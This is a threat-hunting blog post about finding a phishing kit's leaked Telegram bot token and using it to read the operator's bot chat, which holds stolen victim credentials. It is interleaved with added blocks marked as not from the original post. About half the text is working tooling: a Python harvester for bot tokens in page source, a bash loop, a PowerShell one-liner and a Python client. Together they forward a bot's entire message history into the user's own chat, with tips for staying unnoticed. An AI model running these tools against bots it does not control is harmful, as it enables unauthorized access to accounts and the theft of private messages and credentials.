From Phishing to Infiltration: How a Leaked Telegram Bot Token Unveiled a Threat Actor’s Entire Operations

bl7ck0ut
6 min read · Aug 26, 2024


In cybersecurity, even the most routine tasks can lead to unexpected discoveries. This is the story of how analyzing a single phishing email, and pivoting on a few interesting data points, led me to more phishing pages set up by the same threat actor. One of those pages was inadvertently leaking a Telegram bot token together with a chat ID, which let me get inside their bot.

The bot wasn't just a tool; it was the nerve center of the whole phishing campaign, receiving real-time data on every compromised victim. The process I followed is straightforward, and with a bit of luck you might stumble onto something equally interesting.

Let’s Begin !!!

It all started with a phishing email that landed in my inbox. At first glance it looked like another run-of-the-mill scam: a counterfeit login page built to steal credentials. Instead of brushing it off, I decided to investigate. I opened the link in a sandbox to analyze the landing page and examine the files and assets it loaded, and, to probe the attacker's setup further, submitted some fake credentials.

I like to look at these phishing pages and URLs in URLScan.io.

Expanding the Investigation: Mapping Out the Threat Actor’s Network

urlscan.io is an invaluable tool for analyzing suspicious links and uncovering detailed information about potentially malicious sites. It provides a wealth of data, including the domain's DNS records, TLS certificates and hosting details, which can reveal connections to other malicious sites, and it captures metadata such as the server's response headers, IP address and geographic location.

I frequently check the DOM and Content tabs on urlscan.io, as they can reveal specific keywords that help refine searches. This time nothing stood out there. While using the browser's Web Developer tools, however, I noticed an unusual cookie name set by the phishing page. urlscan.io lets you search specifically by cookie name with the content.cookieNames filter, so I gave that a try.

content.cookieNames:"nameofthecookie"

To my surprise, the results were quite interesting.

Out of more than 1,000 results, some of them old, I focused on the most recent ones and noticed a pattern: many of the pages were flagged as malicious. As I worked through them it became clear they were all part of one phishing scheme targeting companies and organizations around the globe. Each site offered additional clues, and they eventually led me to a phishing page leaking two Base64-encoded JavaScript globals, var token and var chatID. Decoding them in CyberChef gave values that looked like this (dummy data, for illustration):

token = 1234567890:ABCdefGHIjklMNO_pqrSTUVwxYz1234567890
chatID = 1122334455 // dummy data
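As an added example (not part of the original post), here is a small Python helper that performs the decoding step above programmatically over a page's source: it finds var token / var chatID assignments, tries each value as written and Base64-decoded, and keeps it only if the result has the shape of a Telegram bot token or chat ID, so an unrelated global that happens to be called token is ignored. The sample page at the bottom is constructed from the dummy token and chat ID above; the extra variable-name variants it accepts (let/const, chat_id) are my assumption about what other kits use, not something the post states.

```python
import base64
import re

# Telegram bot tokens look like "<numeric bot id>:<secret of around 35 URL-safe chars>";
# chat IDs are signed integers (negative for groups and channels).
TOKEN_RE = re.compile(r"^\d{6,12}:[A-Za-z0-9_-]{30,}$")
CHAT_ID_RE = re.compile(r"^-?\d{5,20}$")

# `var token = "..."`, `var chatID = '...'`, plus the let/const and chat_id variants
# (assumed to be used by other kits; the post only mentions var token / var chatID).
VAR_RE = re.compile(
    r"""(?:var|let|const)\s+(?P<name>token|chatid|chat_id)\s*=\s*["'](?P<value>[^"']+)["']""",
    re.IGNORECASE,
)


def _candidates(raw: str):
    """Yield the value as written, then its Base64 decoding if it decodes cleanly.
    Kits store these plain or Base64-encoded; checking both handles either case."""
    raw = raw.strip()
    yield raw
    try:
        yield base64.b64decode(raw, validate=True).decode("ascii").strip()
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return


def extract_telegram_creds(page_source: str) -> dict:
    """Return {"token": ..., "chat_id": ...} for the values found in page_source.
    A value is accepted only if it (raw or decoded) matches the Telegram format,
    so unrelated globals named token (CSRF tokens and the like) are skipped."""
    found = {}
    for m in VAR_RE.finditer(page_source):
        key = "token" if m.group("name").lower() == "token" else "chat_id"
        pattern = TOKEN_RE if key == "token" else CHAT_ID_RE
        for cand in _candidates(m.group("value")):
            if pattern.match(cand):
                found[key] = cand
                break
    return found


# Constructed sample page built from the post's dummy token and chat ID (not real).
DUMMY_TOKEN = "1234567890:ABCdefGHIjklMNO_pqrSTUVwxYz1234567890"
DUMMY_CHAT_ID = "1122334455"


def _b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


SAMPLE_PAGE = f"""<script>
var csrf_token = "9f2a0c4e";            // unrelated global, must be ignored
var token = "{_b64(DUMMY_TOKEN)}";
var chatID = "{_b64(DUMMY_CHAT_ID)}";
</script>"""

if __name__ == "__main__":
    print(extract_telegram_creds(SAMPLE_PAGE))
```

Feed it the raw HTML or any loaded script (the Content tab on urlscan.io gives you both); the same regex also works on kits that keep the two values unencoded, since the raw value is tried first.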

A Telegram bot token and a chat ID: a mistake on the attacker's part, but a golden opportunity for me. With the token I could call the bot's API directly and look into the bot's chat and, potentially, their whole operation.

Infiltration: Exploiting the Bot’s Misconfigurations

It's not uncommon for phishing kits and other malicious packages to exfiltrate victims' data through Telegram bots. With the bot token and chat ID in hand, I turned to Telegram's Bot API to see what I could extract.

The first step involved using the Telegram API’s getMe method with the bot token, as illustrated below:

curl "https://api.telegram.org/bot{bot-token}/getMe"

This call confirms that the token is valid and the bot is active, and returns the bot's own identity: its numeric ID, username and first name, plus capability flags such as can_join_groups and can_read_all_group_messages. It does not reveal who created the bot; the operator's identity has to come from the chat itself.

The next step is to get at the chat where the interesting data lives, so the following call fetches the updates queued for the bot.

curl "https://api.telegram.org/bot{bot-token}/getUpdates"

getUpdates retrieves the incoming updates queued for a bot: messages, commands and other events sent to it. It only works for bots that poll instead of using a webhook; if the operator has registered a webhook the call fails with 409 Conflict, and you should leave that webhook alone, since deleting it would break their pipeline and is very visible. Two more caveats: getUpdates returns only messages sent to the bot, not messages the bot itself posted, so what the kit pushes with sendMessage will not show up here; and calling it without an offset parameter is non-destructive, whereas passing an offset acknowledges and discards the earlier updates, which the operator's own polling would notice.

Additionally, you can use the forwardMessage method to copy messages out of the attacker's chat into a chat you control, provided you have the necessary pieces: the attacker bot's token, the chat ID the kit posts to (from_chat_id), a destination chat_id, and the message IDs. Telegram bots cannot message other bots, so the destination has to be a chat the attacker's bot is able to deliver to, such as an account that has started a conversation with it or a group it has been added to. In a private chat the message IDs are sequential, so you iterate through them and forward the messages one by one.

I created a script that iterated through each message ID, forwarding all the messages from the threat actor’s bot to my own bot. This allowed me to capture and review all the messages that had been received by the threat actor’s bot.

PowerShell one-liner (in Windows PowerShell, curl is an alias for Invoke-WebRequest):

curl -Uri "https://api.telegram.org/bot{attacker_bot_token}/forwardMessage" -Method POST -ContentType "application/json" -Body '{"from_chat_id":"{attacker_chat_id}","chat_id":"{my_chat_id}","message_id":{message_id}}'

Bash loop over a list of message IDs:

#!/bin/bash
# Forward every message in the attacker's bot chat into a chat you control,
# using the leaked token. Fill in the three values below.
attacker_bot_token="attacker_bot_token"   # token leaked by the phishing page
attacker_chat_id="attacker_chat_id"       # chatID leaked next to it (from_chat_id)
my_chat_id="your_chat_id"                 # destination the attacker's bot can deliver to

# Replace with the message IDs you want to forward. In a private chat they are
# sequential from 1, so a contiguous range can be generated: message_ids=($(seq 1 500))
message_ids=(message_id_1 message_id_2 message_id_3)

for message_id in "${message_ids[@]}"; do
    # -f turns a 4xx reply (e.g. "message to forward not found" for a deleted ID)
    # into a non-zero exit, so gaps are reported instead of scrolling past unnoticed.
    curl -sS -f -X POST "https://api.telegram.org/bot${attacker_bot_token}/forwardMessage" \
        -H "Content-Type: application/json" \
        -d "{\"from_chat_id\":\"${attacker_chat_id}\",\"chat_id\":\"${my_chat_id}\",\"message_id\":${message_id}}" \
        || echo "message ${message_id}: not forwarded" >&2
    sleep 1   # Telegram allows roughly one message per second into a given chat
done

Explanation:

Replace the three placeholder values at the top of the script with the real ones: the attacker's bot token and chat ID leaked by the page, and the ID of a chat the attacker's bot is able to deliver to.

Replace message_id_1, message_id_2, etc. in the message_ids array with the message IDs you want to forward; for a contiguous range you can generate the array with seq.

curl makes the HTTP request to the Bot API; forwardMessage takes a JSON body with from_chat_id, chat_id and message_id.

The loop sends one POST per message_id, forwarding that message into your chat.
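An added example, not from the post: the three API calls above (getMe, getUpdates, forwardMessage) as a small Python client with the behaviour a practitioner actually needs in this situation. getUpdates is called without an offset so nothing is acknowledged; the forwardMessage walk treats a 400 "message to forward not found" as a gap, backs off on 429 using the server's retry_after, and stops after a run of gaps so the upper message ID does not have to be known. The HTTP transport is injectable, and fake_transport and SAMPLE_UPDATES at the bottom are constructed stand-ins (reusing the post's dummy chat ID) so the file runs offline; the destination chat ID and message IDs used with it are made up. Python rather than bash here because the error handling is the point.

```python
import json
import time
import urllib.error
import urllib.parse
import urllib.request

API = "https://api.telegram.org"

class TelegramError(Exception):
    def __init__(self, code, description, retry_after=None):
        super().__init__(f"{code}: {description}")
        self.code, self.retry_after = code, retry_after   # retry_after only set for 429

def http_transport(token, method, params):
    """Live transport: POST params form-encoded, return the parsed JSON body. Telegram
    sends its JSON error body with a 4xx status, so the HTTPError body is read as well."""
    req = urllib.request.Request(f"{API}/bot{token}/{method}",
                                 data=urllib.parse.urlencode(params).encode())
    try:
        with urllib.request.urlopen(req, timeout=30) as resp:
            return json.load(resp)
    except urllib.error.HTTPError as err:
        return json.load(err)

class Bot:
    def __init__(self, token, transport=http_transport):
        self.token, self.transport = token, transport

    def call(self, method, **params):
        """Any Bot API method, e.g. call("getMe"); raises TelegramError on ok=false."""
        body = self.transport(self.token, method, params)
        if not body.get("ok"):
            retry = (body.get("parameters") or {}).get("retry_after")
            raise TelegramError(body.get("error_code"), body.get("description", ""), retry)
        return body["result"]

    def get_updates(self):
        # No offset on purpose: nothing is acknowledged, so the operator's own polling still
        # sees everything. A 409 means a webhook is set; leave it (deleteWebhook is visible).
        return self.call("getUpdates", limit=100)

    def forward_range(self, from_chat_id, to_chat_id, first_id, last_id,
                      stop_after_missing=50, pause=1.0, sleep=time.sleep):
        """Forward message_id first_id..last_id into a chat you control and return
        (forwarded_ids, missing_ids). 400 'message to forward not found' is a gap; a run of
        stop_after_missing gaps ends the walk, so last_id can be a generous guess."""
        forwarded, missing, gap_run, mid = [], [], 0, first_id
        while mid <= last_id and gap_run < stop_after_missing:
            try:
                self.call("forwardMessage", chat_id=to_chat_id,
                          from_chat_id=from_chat_id, message_id=mid)
                forwarded.append(mid)
                gap_run = 0
            except TelegramError as err:
                if err.code == 429:                   # throttled: wait what the server asks
                    sleep(err.retry_after or pause)
                    continue                          # and retry the same id
                if err.code != 400:                   # 401 bad token, 403 cannot deliver, ...
                    raise
                missing.append(mid)
                gap_run += 1
            mid += 1
            sleep(pause)                              # ~1 message/s per chat avoids 429s
        return forwarded, missing

def summarize_updates(updates):
    """chat_id -> highest message_id seen. Only messages sent *to* the bot (the operator's
    /start, commands) appear in getUpdates, never the bot's own posts: a lower bound only."""
    highest = {}
    for msg in (u["message"] for u in updates if "message" in u):
        highest[msg["chat"]["id"]] = max(highest.get(msg["chat"]["id"], 0), msg["message_id"])
    return highest

# Constructed stand-in for the API so the block runs offline; nothing below is real data.
SAMPLE_UPDATES = [
    {"update_id": 700000001, "message": {"message_id": 1, "chat": {"id": 1122334455}, "text": "/start"}},
    {"update_id": 700000002, "message": {"message_id": 3, "chat": {"id": 1122334455}, "text": "test"}},
]

def fake_transport(present_ids, webhook_active=False):
    """Throttles the first forward once (429) and 400s on message IDs not in present_ids."""
    throttled = []
    def transport(token, method, params):
        if method == "getMe":
            return {"ok": True, "result": {"id": 1234567890, "is_bot": True, "username": "dummy_bot"}}
        if method == "getUpdates" and webhook_active:
            return {"ok": False, "error_code": 409, "description": "Conflict: can't use getUpdates method while webhook is active"}
        if method == "getUpdates":
            return {"ok": True, "result": SAMPLE_UPDATES}
        if not throttled:                             # forwardMessage: rate-limit the first call
            throttled.append(True)
            return {"ok": False, "error_code": 429, "description": "Too Many Requests", "parameters": {"retry_after": 2}}
        if int(params["message_id"]) in present_ids:
            return {"ok": True, "result": {"message_id": 900 + int(params["message_id"])}}
        return {"ok": False, "error_code": 400, "description": "Bad Request: message to forward not found"}
    return transport
```

Against the live API you would do Bot(token).call("getMe"), then summarize_updates(Bot(token).get_updates()) to see which chats the operator has talked to the bot from, then Bot(token).forward_range(attacker_chat_id, my_chat_id, 1, 5000) and let the gap run terminate the walk. Offline, Bot("1234567890:dummy", transport=fake_transport({1, 2, 3, 5})) exercises the 429 retry, the gap handling and the early stop without touching the network.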

The Real-Time Gold Mine: Live Data from Phishing Attacks

This chat was a gold mine. Every time someone fell for one of the phishing pages, the bot posted a new message to the chat containing the victim's credentials along with their IP address, geographic location (looked up through ipinfo) and user agent. This wasn't just historical data; it was arriving in real time, and I could watch the attackers' successes as they happened.

The Bigger Picture: Inside the Threat Actor’s Operations

As I monitored the chat, I gained valuable insight into the threat actor's operations. The compromised credentials included accounts at a range of companies, among them startups in the tech and medical sectors and a few other industries, which shows the scale and potential impact of the campaign.

Conclusion

This experience underscores the importance of digging deeper into even the most routine phishing email. A single message led to a token leaked in the threat actor's own infrastructure, which gave me real-time insight into their operations and turned the tables on them.

In cybersecurity, the smallest clues can lead to the biggest breakthroughs. This case is a powerful reminder of why it’s essential to follow up on every lead, no matter how insignificant it might seem. You never know what you might uncover when you do.

Thanks for reading!

Written by bl7ck0ut

Incident Responder, Threat Analysis
